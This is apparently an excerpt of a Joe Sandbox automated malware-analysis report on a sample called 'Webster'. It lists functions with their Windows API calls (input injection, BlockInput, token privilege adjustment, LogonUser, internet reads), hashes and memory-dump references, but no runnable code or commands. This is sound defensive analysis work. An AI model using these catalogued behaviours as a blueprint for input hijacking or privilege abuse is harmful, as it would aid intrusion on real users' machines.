                                                                                  • Opcode ID: f87efcbf1854d9092afee6e66a56b51b5d5da2629fe22c7af7e85a8605a741b5
                                                                                  • Instruction ID: 648c980480628243c1c74e95b4b22b551074198d8838a542c2ad2fc64abfcc3f
                                                                                  • Opcode Fuzzy Hash: f87efcbf1854d9092afee6e66a56b51b5d5da2629fe22c7af7e85a8605a741b5
                                                                                  • Instruction Fuzzy Hash: 9211BF723009169FE7316F669C84A6FBFD9EF84760B408169F806D7281DE70E9018FA0
                                                                                  Function 00AC0030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: LocalTime__swprintf
                                                                                  • String ID: %.3d$WIN_XPe
                                                                                  • API String ID: 2070861257-2409531811
                                                                                  • Opcode ID: 58195f4a9a955d512fee980145a1952f07ad3a90ee8acb3d9fb8572004b7a96f
                                                                                  • Instruction ID: 0c3c5d500a8aa21809c3c10268df8bc70a4bf1efe744399c04f966048f737b61
                                                                                  • Opcode Fuzzy Hash: 58195f4a9a955d512fee980145a1952f07ad3a90ee8acb3d9fb8572004b7a96f
                                                                                  • Instruction Fuzzy Hash: D5D05B72818108EACB049B90CD44FFE73BCEB48300F224056F506E3050D7358788DB26
                                                                                  Function 00AF29BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00AF2AAD
                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00AF2AE4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                  • String ID:
                                                                                  • API String ID: 599397726-0
                                                                                  • Opcode ID: 9185c073ed58e9c255ffe0c693ef46b655457653cda37084c450724cd1ae4c22
                                                                                  • Instruction ID: 2d77bf6af507bd5f15edd981927e3d6e4c8fc260e8e3aff7cce4360252b126ea
                                                                                  • Opcode Fuzzy Hash: 9185c073ed58e9c255ffe0c693ef46b655457653cda37084c450724cd1ae4c22
                                                                                  • Instruction Fuzzy Hash: 5A415D7160460DBFEB20EE94CD85FBAB7BCEB407A4F10406AFB45A7181EA719E419760
                                                                                  Function 00AD9399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
                                                                                    • Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AD93E3
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AD9410
                                                                                  • GetLastError.KERNEL32 ref: 00AD941D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 1922334811-0
                                                                                  • Opcode ID: 5cc461a8c52c3a7df41b5e9a856f779fec5c92c1a9c2e7a8d862a00bdd15f25d
                                                                                  • Instruction ID: b6dbbb3b87c711b247d60fbbef0188099940ff6c8031d8104758649f6ce96585
                                                                                  • Opcode Fuzzy Hash: 5cc461a8c52c3a7df41b5e9a856f779fec5c92c1a9c2e7a8d862a00bdd15f25d
                                                                                  • Instruction Fuzzy Hash: 16118FB1414209AFD728EF54DD85D6BB7BCEB48710B20852EF45A97281EB70EC41CB64
                                                                                  Function 00AE42D5 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AE42FF
                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00AE433C
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AE4345
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                                  • String ID:
                                                                                  • API String ID: 33631002-0
                                                                                  • Opcode ID: 3f92096934044d3b0f56b84cbe3e5da399fa33eb43be7f9cf066d5ad160881f6
                                                                                  • Instruction ID: 810de1b6f92f25559f539c407ff92c2953d3b38d4204eec6cd8f616bec7948fc
                                                                                  • Opcode Fuzzy Hash: 3f92096934044d3b0f56b84cbe3e5da399fa33eb43be7f9cf066d5ad160881f6
                                                                                  • Instruction Fuzzy Hash: FE1182B1910229BFE7109BE99C48FEFB7BCEB0D710F004156B914EB190C6B85E4087A1
                                                                                  Function 00AE4F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00AE4F45
                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00AE4F5C
                                                                                  • FreeSid.ADVAPI32(?), ref: 00AE4F6C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                  • String ID:
                                                                                  • API String ID: 3429775523-0
                                                                                  • Opcode ID: bceb8b7cd61e67a82781b08ef77c2d94a67728aa96155b9644b9f9ed4ce64179
                                                                                  • Instruction ID: 07690182cbac3684f1d88afcc251ed97d02c0801ec4d167bc96ff6a64627acb4
                                                                                  • Opcode Fuzzy Hash: bceb8b7cd61e67a82781b08ef77c2d94a67728aa96155b9644b9f9ed4ce64179
                                                                                  • Instruction Fuzzy Hash: 7EF04975A2130CBFDF00DFE0DC89AEEBBBCEF08201F4044A9A901E3180EB756A448B50
                                                                                  Function 00AE1AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00AE1B01
                                                                                  • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00AE1B14
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: InputSendkeybd_event
                                                                                  • String ID:
                                                                                  • API String ID: 3536248340-0
                                                                                  • Opcode ID: af158c185cdce154ebffa9dca5cb2800978d409922224581d89d4a9bcdc4d119
                                                                                  • Instruction ID: 0e67eac8fa7398e32bf043d77cbf57daa5696e1468a2ebb8893d9c91d0e458d6
                                                                                  • Opcode Fuzzy Hash: af158c185cdce154ebffa9dca5cb2800978d409922224581d89d4a9bcdc4d119
                                                                                  • Instruction Fuzzy Hash: A2F0A93190024CABDB00DF91C805BFEBBB4FF14301F00800AF94596292D3798611DF94
                                                                                  Function 00AEA6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00AF9B52,?,00B1098C,?), ref: 00AEA6DA
                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00AF9B52,?,00B1098C,?), ref: 00AEA6EC
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFormatLastMessage
                                                                                  • String ID:
                                                                                  • API String ID: 3479602957-0
                                                                                  • Opcode ID: 155d3660d536c5c3d03b86f24bb0e36d2e636ed963640bc2a2b3fb823b225a73
                                                                                  • Instruction ID: a37295f02fc296a9da4f029f12cc4c32b1db0434ddbef963d4dc5c4d020a3ea4
                                                                                  • Opcode Fuzzy Hash: 155d3660d536c5c3d03b86f24bb0e36d2e636ed963640bc2a2b3fb823b225a73
                                                                                  • Instruction Fuzzy Hash: 5DF0823551422EBBDB20AFA5CC48FEA77ACAF09361F008156B91897191DA709A40CBE1
                                                                                  Function 00AD8DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AD8F27), ref: 00AD8DFE
                                                                                  • CloseHandle.KERNEL32(?,?,00AD8F27), ref: 00AD8E10
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                  • String ID:
                                                                                  • API String ID: 81990902-0
                                                                                  • Opcode ID: 724c94048e45543d2af35670a3166eabb632f3829d8eafe509e36261a49c98fa
                                                                                  • Instruction ID: 6ae055b2345734e977aa208cff6f386a8c971ea5bb2eed9b2de9d5ee3604a234
                                                                                  • Opcode Fuzzy Hash: 724c94048e45543d2af35670a3166eabb632f3829d8eafe509e36261a49c98fa
                                                                                  • Instruction Fuzzy Hash: 84E0B676010611EFE7262B60ED09EB77BADEB05360B15C92DF4AA854B0DB62ACD0DB50
                                                                                  Function 00AAA385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00AA8F87,?,?,?,00000001), ref: 00AAA38A
                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00AAA393
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: 0de7747be17cb18b919877a137ae50f8b36f3f5b62b17d0924a45a8462b26155
                                                                                  • Instruction ID: 8c2ecc9b544c6a1006f908ee80535bc204f304c09052e9f13d000605e6137799
                                                                                  • Opcode Fuzzy Hash: 0de7747be17cb18b919877a137ae50f8b36f3f5b62b17d0924a45a8462b26155
                                                                                  • Instruction Fuzzy Hash: 4DB0923107420CEBCA403B91FC09BC83F68EB48B62F808010F61D46064CFA254908A99
                                                                                  Function 00AF45D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • BlockInput.USER32(00000001), ref: 00AF45F0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BlockInput
                                                                                  • String ID:
                                                                                  • API String ID: 3456056419-0
                                                                                  • Opcode ID: 3fccb5c4993b4d7c529490099916504c1a6eaeee39bbcb0bec5fe38a500efb56
                                                                                  • Instruction ID: 100426b60f15dc5f13c062993afb3a2cb247b5a81228a017a320bfbfed5ac638
                                                                                  • Opcode Fuzzy Hash: 3fccb5c4993b4d7c529490099916504c1a6eaeee39bbcb0bec5fe38a500efb56
                                                                                  • Instruction Fuzzy Hash: 6EE04F352102199FD710BFA9E904A9BF7E8AF98760F008416FD49D7351DEB0ED418B91
                                                                                  Function 00AE51E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00AE5205
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: mouse_event
                                                                                  • String ID:
                                                                                  • API String ID: 2434400541-0
                                                                                  • Opcode ID: 0d983752b29fc27688fbe22bdab808e6ef2982ef8036a24c79463e5e15ba75aa
                                                                                  • Instruction ID: 85254b9cec51d6d11efeb4670ddebc95546da76b627e42222c4488224708a69a
                                                                                  • Opcode Fuzzy Hash: 0d983752b29fc27688fbe22bdab808e6ef2982ef8036a24c79463e5e15ba75aa
                                                                                  • Instruction Fuzzy Hash: 83D052A8960F8A78EC1833BABE0FF761208EB007C8F84874970028A0C2ECD06881A431
                                                                                  Function 00AD9369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00AD8FA7), ref: 00AD9389
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: LogonUser
                                                                                  • String ID:
                                                                                  • API String ID: 1244722697-0
                                                                                  • Opcode ID: 0854604f25d62223c7ac238abbd63e833cdfba3f8a7efad1dd6aa6eedf71345d
                                                                                  • Instruction ID: 52c6625989d39161f9b8a1f11529b4d43dc9e1c31ac11883596ac3c91e06ca80
                                                                                  • Opcode Fuzzy Hash: 0854604f25d62223c7ac238abbd63e833cdfba3f8a7efad1dd6aa6eedf71345d
                                                                                  • Instruction Fuzzy Hash: 60D09E3226450EABEF019EA4DD05EEE3B69EB04B01F808511FE15D61A1CB75D935AB60
                                                                                  Function 00AC0722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00AC0734
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameUser
                                                                                  • String ID:
                                                                                  • API String ID: 2645101109-0
                                                                                  • Opcode ID: c3c843ba409625b0b08a3902044e2ebdf4230f0d8ed3730a2623107430487801
                                                                                  • Instruction ID: 89874b5e0a5ac1fe1730e6e2d3ab661db014f9df5b0ed76a3aab4b8256c6ad2e
                                                                                  • Opcode Fuzzy Hash: c3c843ba409625b0b08a3902044e2ebdf4230f0d8ed3730a2623107430487801
                                                                                  • Instruction Fuzzy Hash: 9AC04CF181010DDBCB05DBA0D988EEE77BCAB08305F114059A145B2100D7749B448A71
                                                                                  Function 00AAA354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00AAA35A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: b1115a0167e491ea8c7ed76d59703a08ece2ecb950937cb0a8261407825e05d7
                                                                                  • Instruction ID: c2d3e0d40518837f13437eb3b3eaab30e2d4e9077106cf6d2221920c396668db
                                                                                  • Opcode Fuzzy Hash: b1115a0167e491ea8c7ed76d59703a08ece2ecb950937cb0a8261407825e05d7
                                                                                  • Instruction Fuzzy Hash: B5A0123002010CA78A002B41FC044847F5CD6042507408010F40C01021CB7254504584
                                                                                  Function 00B03BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?,00B10980), ref: 00B03C65
                                                                                  • IsWindowVisible.USER32(?), ref: 00B03C89
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpperVisibleWindow
                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                  • API String ID: 4105515805-45149045
                                                                                  • Opcode ID: d21f6bb0e190a0ef714a82f90d438d006c8331ddf8341555875d9ec4f4b515ed
                                                                                  • Instruction ID: 9b50e2e975de780103338a461ccd827b7ebafc53c846a0b60123545166f96c3d
                                                                                  • Opcode Fuzzy Hash: d21f6bb0e190a0ef714a82f90d438d006c8331ddf8341555875d9ec4f4b515ed
                                                                                  • Instruction Fuzzy Hash: C5D1A0312043018FCB14EF50C995AAEBBE5EF95744F204999F9466B3E2DB31EE4ACB41
                                                                                  Function 00B0ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00B0AC55
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00B0AC86
                                                                                  • GetSysColor.USER32(0000000F), ref: 00B0AC92
                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 00B0ACAC
                                                                                  • SelectObject.GDI32(?,?), ref: 00B0ACBB
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00B0ACE6
                                                                                  • GetSysColor.USER32(00000010), ref: 00B0ACEE
                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00B0ACF5
                                                                                  • FrameRect.USER32(?,?,00000000), ref: 00B0AD04
                                                                                  • DeleteObject.GDI32(00000000), ref: 00B0AD0B
                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00B0AD56
                                                                                  • FillRect.USER32(?,?,?), ref: 00B0AD88
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B0ADB3
                                                                                    • Part of subcall function 00B0AF18: GetSysColor.USER32(00000012), ref: 00B0AF51
